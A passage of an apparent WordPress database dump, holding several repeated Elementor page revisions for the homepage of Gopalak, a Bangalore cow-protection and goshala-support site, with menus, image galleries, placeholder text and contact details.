.swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\" alt=\"pexels-karolina-grabowska-4219654\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\" alt=\"pexels-ave-calvar-martinez-3637852\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/values.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/values.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/values-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/values-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/values-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/values-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/values-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/values-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/values-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-13 15:57:27','2022-10-13 10:27:27','',1373,'https://gopalak.in/?p=1721',0,'revision','',0),(1722,1,'2022-10-13 15:59:45','2022-10-13 10:29:45','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"960\" height=\"1010\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 960px) 100vw, 960px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\" alt=\"pexels-karolina-grabowska-4219654\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\" alt=\"pexels-ave-calvar-martinez-3637852\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/values.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/values.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/values-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/values-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/values-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/values-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/values-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/values-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/values-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-13 15:59:45','2022-10-13 10:29:45','',1373,'https://gopalak.in/?p=1722',0,'revision','',0),(1723,1,'2022-10-13 15:59:45','2022-10-13 10:29:45','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"960\" height=\"1010\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 960px) 100vw, 960px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\" alt=\"pexels-karolina-grabowska-4219654\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\" alt=\"pexels-ave-calvar-martinez-3637852\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/values.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/values.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/values-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/values-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/values-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/values-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/values-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/values-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/values-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-13 15:59:45','2022-10-13 10:29:45','',1373,'https://gopalak.in/?p=1723',0,'revision','',0),(1724,1,'2022-10-13 15:59:45','2022-10-13 10:29:45','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"960\" height=\"1010\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 960px) 100vw, 960px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-karolina-grabowska-4219654-scaled.jpg\" alt=\"pexels-karolina-grabowska-4219654\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-ave-calvar-martinez-3637852-scaled.jpg\" alt=\"pexels-ave-calvar-martinez-3637852\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" 